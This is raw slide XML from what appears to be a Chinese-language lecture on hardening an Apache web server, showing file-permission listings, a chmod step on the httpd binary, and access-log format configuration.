                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655955">
                <a:moveTo>
                  <a:pt x="9525" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655955">
                <a:moveTo>
                  <a:pt x="5980290" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655955">
                <a:moveTo>
                  <a:pt x="5989815" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980290" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="651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14228" y="1597723"/>
            <a:ext cx="5147945" cy="104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0600" algn="l"/>
                <a:tab pos="3322954" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-rw-r--r--	1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root root </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>11820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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>月	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>6 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>11:58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httpd.conf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spc="-5" dirty="0"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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/usr/sbin/httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0"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-rwxr-xr-x. 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root root 519432 4 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r>
              <a:rPr sz="1800" spc="4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13 05:04 httpd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4967" y="3203448"/>
            <a:ext cx="5980430" cy="647700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5980430" h="647700">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980176" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980176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0726" y="3199409"/>
            <a:ext cx="5989955" cy="655955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5989955" h="655954">
                <a:moveTo>
                  <a:pt x="5985052" y="655853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="655853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="655624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="654938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="653884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598981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646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989586" y="652564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5988913" y="653884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5987859" y="654938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986526" y="655624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="655853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="65595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989955" h="655954">
                <a:moveTo>
                  <a:pt x="598029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980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655954">
                <a:moveTo>
                  <a:pt x="5980290" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655954">
                <a:moveTo>
                  <a:pt x="5989815" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5985052" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655954">
                <a:moveTo>
                  <a:pt x="9525" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655954">
                <a:moveTo>
                  <a:pt x="5980290" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="651090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="655954">
                <a:moveTo>
                  <a:pt x="5989815" y="651090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980290" y="651090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="646328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="651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9851" y="2651924"/>
            <a:ext cx="8522322" cy="1170377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对可执行文件更好的保护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#chmod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511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/usr/sbin/httpd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389255" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0"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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/usr/sbin/httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0"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3386454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-r-x--x--x. 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root root 519432 4 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r>
              <a:rPr sz="1800" spc="3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13 05:04 httpd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7367" y="4041647"/>
            <a:ext cx="5980430" cy="922019"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5980430" h="922020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980176" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980176" y="922020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92202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126" y="4036237"/>
            <a:ext cx="5989955" cy="933450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5989955" h="933450">
                <a:moveTo>
                  <a:pt x="5985052" y="932865"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="932865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="931951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="930897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="928103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598981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23340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="928103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989586" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5988913" y="930897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5987859" y="931951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986526" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="932865"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="933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989955" h="933450">
                <a:moveTo>
                  <a:pt x="598029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980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="933450">
                <a:moveTo>
                  <a:pt x="5980290" y="928103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="928103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="933450">
                <a:moveTo>
                  <a:pt x="5989815" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5985052" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="933450">
                <a:moveTo>
                  <a:pt x="9525" y="928103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="933450">
                <a:moveTo>
                  <a:pt x="5980290" y="928103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="928103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5980290" y="928103"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="5989955" h="933450">
                <a:moveTo>
                  <a:pt x="5989815" y="928103"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5980290" y="928103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5985052" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="923340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5989815" y="928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6628" y="4062590"/>
            <a:ext cx="20453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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-rw-r--r--	1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89965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-rw-r--r--	1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89965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-rw-r--r--	1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>root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9928" y="4062590"/>
            <a:ext cx="3707130" cy="858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7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25 15:30</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-3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access_log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1703 8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12 08:48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error_log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7 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r>
              <a:rPr sz="1800" spc="5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25 15:30 ssl_access_log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90604" y="3811270"/>
            <a:ext cx="501650" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="501650" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="501396" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50139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902335" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="902335" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="902208" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90220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2208" y="2043683"/>
            <a:ext cx="10788650" cy="830580"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10788650" h="830580">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10788396" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10788396" y="830580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="83058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156" y="2038883"/>
            <a:ext cx="10797540" cy="840740"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10797540" h="840739">
                <a:moveTo>
                  <a:pt x="10792269" y="840524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="840524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="840282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="839609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="838555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="837222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079703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830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10796803" y="837222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10796130" y="838555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10795076" y="839609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10793742" y="840282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="840524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="84073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797540" h="840739">
                <a:moveTo>
                  <a:pt x="1078750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0787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="840739">
                <a:moveTo>
                  <a:pt x="10787507" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="840739">
                <a:moveTo>
                  <a:pt x="10797032" y="9524"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10792269" y="9524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="9524"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="840739">
                <a:moveTo>
                  <a:pt x="9525" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="840739">
                <a:moveTo>
                  <a:pt x="10787507" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="835761"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="840739">
                <a:moveTo>
                  <a:pt x="10797032" y="835761"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787507" y="835761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="830999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="83576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208" y="3215639"/>
            <a:ext cx="10788650" cy="3139440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10788650" h="3139440">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10788396" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10788396" y="3139440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3139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156" y="3210318"/>
            <a:ext cx="10797540" cy="3148965"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10792269" y="3148850"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3148850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="3148622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="3147936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="3146882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="3145561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3144088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1079703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139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3144088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="3144088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10796803" y="3145561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10796130" y="3146882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10795076" y="3147936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10793742" y="3148622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="3148850"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="314896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797540" h="3148965">
                <a:moveTo>
                  <a:pt x="1078750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787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10787507" y="3144088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="3144088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10797032" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10792269" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="9525" y="3144088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3144088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10787507" y="3144088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="3144088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10787507" y="3144088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10797540" h="3148965">
                <a:moveTo>
                  <a:pt x="10797032" y="3144088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10787507" y="3144088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10792269" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="3139325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10797032" y="31440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1597723"/>
            <a:ext cx="11050905" cy="468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access_log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800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="354330">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1530"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>192.168.44.1 - - [28/May/2017:20:19:08 +0800] "GET /test.php HTTP/1.1" 200 97989 "-" "Mozilla/5.0 (Windows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NT</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="354330" marR="17894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10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Chrome/58.0.3029.110 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Safari/537.36"  192.168.44.1 - - [28/May/2017:20:20:00 +0800] "-" 408 - "-"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"-"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  <a:spcBef>
                <a:spcPts val="1385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;IfModule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log_config_module&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="608330" marR="17005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LogFormat "%h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined  LogFormat "%h %l %u %t \"%r\" %&gt;s %b"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common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083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&lt;IfModule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logio_module&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="73533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6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need to enable mod_logio.c to use %I and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%O</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7353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LogFormat "%h %l %u %t \"%r\" %&gt;s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O"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combinedio</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6083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&lt;/IfModule&gt;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083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CustomLog "logs/access_log" combined</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial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&lt;/IfModule&gt;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94235" y="3811270"/>
            <a:ext cx="398145" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="398145" h="284479">
                <a:moveTo>
